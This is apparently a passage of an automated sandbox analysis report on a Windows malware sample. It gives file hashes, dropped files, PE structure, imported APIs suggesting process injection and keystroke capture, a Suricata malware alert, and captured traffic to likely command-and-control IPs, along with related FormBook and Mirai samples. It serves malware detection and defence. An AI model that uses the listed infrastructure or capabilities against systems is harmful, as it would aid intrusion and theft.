	Fantazy.i486.elf	Get hash	malicious	Unknown	Browse	188.97.99.47
	Fantazy.mpsl.elf	Get hash	malicious	Unknown	Browse	188.110.169.89
	sora.m68k.elf	Get hash	malicious	Unknown	Browse	2.205.253.121
COMING-ASABCDEGROUPCOMPANYLIMITEDHK	smQoKNkwB7.exe	Get hash	malicious	FormBook	Browse	156.226.63.13
	qlG7x91YXH.exe	Get hash	malicious	FormBook	Browse	156.226.63.13
	http://38133.xc.05cg.com/	Get hash	malicious	Unknown	Browse	156.224.208.119
	http://40608.xc.05cg.com/	Get hash	malicious	Unknown	Browse	156.224.208.119
	emips.elf	Get hash	malicious	Mirai	Browse	156.250.110.142
	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	154.197.162.239
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	154.197.162.239
	armv6l.elf	Get hash	malicious	Mirai	Browse	154.197.141.202
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	154.197.162.239
	inv#12180.exe	Get hash	malicious	FormBook	Browse	154.197.162.239

Process:	C:\Windows\SysWOW64\mtstocom.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1221538113908904
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5:	C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1:	6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256:	CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512:	01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Nasalis

Download File

Process:	C:\Users\user\Desktop\FG5wHs4fVX.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.9948212308229
Encrypted:	true
SSDEEP:	6144:PYzpq/EGkF+kYGFdG5LgVjELGMwRGN518rpob+mzFvcyCh4eNDsr3d8:PwUEX3YGFdG5LgG6qDzVNc/NQz6
MD5:	1D14A47ABEA110EFA1BE7FF6321AAF74
SHA1:	30798F6C831ED6B34A3EFEE12A642477C34B23B8
SHA-256:	8EF85CB75C29BEA72FFA8A9148F20BA054DAA4C9EE1D033A941100BD3DCB84B1
SHA-512:	186E1725770CB5D29B928BE24F6CAD64A57AD7D0A8E70B85C08557DF05DD3161A81F7F12D5D836599F1FD2A21082D75604C9729F171E7476F9C490D2AC141F2B
Malicious:	false
Reputation:	low
Preview:	...6V5FGFH0P..XN.A46U5FG.H0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0P.IXNV^.8U.O.c.1..h.&12.F'Z!5#%.3-'6!,aVSuG3)b!^p...n5.PS{8KMfH0PLIXN!@=.hU!..(W.q)?.B..oU!.X.p)?.B..iU!..!S8q)?.XA46U5FG..0P.HYN...`U5FGBH0P.IZOS@?6UaBGBH0PLIXN.U46U%FGB84PLI.NXQ46U7FGDH0PLIXN^A46U5FGB84PLKXNXA46W5..BH PLYXNXA$6U%FGBH0P\IXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNv5QN!5FG..4PLYXNX.06U%FGBH0PLIXNXA46u5F'BH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FG

C:\Users\user\AppData\Local\Temp\aut2815.tmp

Download File

Process:	C:\Users\user\Desktop\FG5wHs4fVX.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.9948212308229
Encrypted:	true
SSDEEP:	6144:PYzpq/EGkF+kYGFdG5LgVjELGMwRGN518rpob+mzFvcyCh4eNDsr3d8:PwUEX3YGFdG5LgG6qDzVNc/NQz6
MD5:	1D14A47ABEA110EFA1BE7FF6321AAF74
SHA1:	30798F6C831ED6B34A3EFEE12A642477C34B23B8
SHA-256:	8EF85CB75C29BEA72FFA8A9148F20BA054DAA4C9EE1D033A941100BD3DCB84B1
SHA-512:	186E1725770CB5D29B928BE24F6CAD64A57AD7D0A8E70B85C08557DF05DD3161A81F7F12D5D836599F1FD2A21082D75604C9729F171E7476F9C490D2AC141F2B
Malicious:	false
Reputation:	low
Preview:	...6V5FGFH0P..XN.A46U5FG.H0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0P.IXNV^.8U.O.c.1..h.&12.F'Z!5#%.3-'6!,aVSuG3)b!^p...n5.PS{8KMfH0PLIXN!@=.hU!..(W.q)?.B..oU!.X.p)?.B..iU!..!S8q)?.XA46U5FG..0P.HYN...`U5FGBH0P.IZOS@?6UaBGBH0PLIXN.U46U%FGB84PLI.NXQ46U7FGDH0PLIXN^A46U5FGB84PLKXNXA46W5..BH PLYXNXA$6U%FGBH0P\IXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNv5QN!5FG..4PLYXNX.06U%FGBH0PLIXNXA46u5F'BH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FGBH0PLIXNXA46U5FG

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.152790981689437
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FG5wHs4fVX.exe
File size:	1'267'712 bytes
MD5:	dab4b7efb8bdd226845a3ffd88fc6fa4
SHA1:	cb798a75a6b322d259f30405609b51ad45a975f5
SHA256:	9300490b5573632ebb7a5bfcf1f2b75b6e6a5b23a3af159b9aa19b10274ce0db
SHA512:	487714ad5315d74c682fbf10f3d5cda290393115f6156c605c6ad8b66defd193582b0499a44ef12478eddc7025b0fe3776c7cf8aa1cb9ad8118f67f944fe487f
SSDEEP:	24576:4qDEvCTbMWu7rQYlBQcBiT6rprG8aHUN4kEoT6PD:4TvC/MTQYxsWR7aHWF
TLSH:	6645C0027391C062FF9B96334F5AF6115ABC79260123E61F13981DBABE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6762D463 [Wed Dec 18 13:55:47 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F8FBD28D733h
jmp 00007F8FBD28D03Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F8FBD28D21Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F8FBD28D1EAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F8FBD28FDDDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F8FBD28FE28h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F8FBD28FE11h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x5ec84	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x133000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x5ec84	0x5ee00	1347450788e15c5d8d8d3c2e4fb56024	False	0.9304003005599473	data	7.900302252577347	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x133000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0x55f49	data			1.0003294771254825
RT_GROUP_ICON	0x132704	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x13277c	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x132790	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1327a4	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1327b8	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x132894	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T18:38:52.048406+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	18.143.155.63	80	192.168.2.9	49983	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 18:38:09.675342083 CET	49975	80	192.168.2.9	156.226.63.13
Jan 10, 2025 18:38:09.680201054 CET	80	49975	156.226.63.13	192.168.2.9
Jan 10, 2025 18:38:09.680283070 CET	49975	80	192.168.2.9	156.226.63.13
Jan 10, 2025 18:38:09.690763950 CET	49975	80	192.168.2.9	156.226.63.13
Jan 10, 2025 18:38:09.695622921 CET	80	49975	156.226.63.13	192.168.2.9
Jan 10, 2025 18:38:10.583400965 CET	80	49975	156.226.63.13	192.168.2.9
Jan 10, 2025 18:38:10.583550930 CET	80	49975	156.226.63.13	192.168.2.9
Jan 10, 2025 18:38:10.583769083 CET	49975	80	192.168.2.9	156.226.63.13
Jan 10, 2025 18:38:10.589626074 CET	49975	80	192.168.2.9	156.226.63.13
Jan 10, 2025 18:38:10.594445944 CET	80	49975	156.226.63.13	192.168.2.9
Jan 10, 2025 18:38:25.661340952 CET	49976	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:25.666313887 CET	80	49976	47.83.1.90	192.168.2.9
Jan 10, 2025 18:38:25.666496992 CET	49976	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:25.687381983 CET	49976	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:25.692235947 CET	80	49976	47.83.1.90	192.168.2.9
Jan 10, 2025 18:38:27.196825027 CET	49976	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:27.243141890 CET	80	49976	47.83.1.90	192.168.2.9
Jan 10, 2025 18:38:27.273763895 CET	80	49976	47.83.1.90	192.168.2.9
Jan 10, 2025 18:38:27.273857117 CET	49976	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:28.215787888 CET	49977	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:28.221301079 CET	80	49977	47.83.1.90	192.168.2.9
Jan 10, 2025 18:38:28.221395969 CET	49977	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:28.236618042 CET	49977	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:28.241445065 CET	80	49977	47.83.1.90	192.168.2.9
Jan 10, 2025 18:38:29.743865013 CET	49977	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:29.748963118 CET	80	49977	47.83.1.90	192.168.2.9
Jan 10, 2025 18:38:29.749082088 CET	49977	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:30.764839888 CET	49978	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:30.769711018 CET	80	49978	47.83.1.90	192.168.2.9
Jan 10, 2025 18:38:30.769798994 CET	49978	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:30.785191059 CET	49978	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:30.790098906 CET	80	49978	47.83.1.90	192.168.2.9
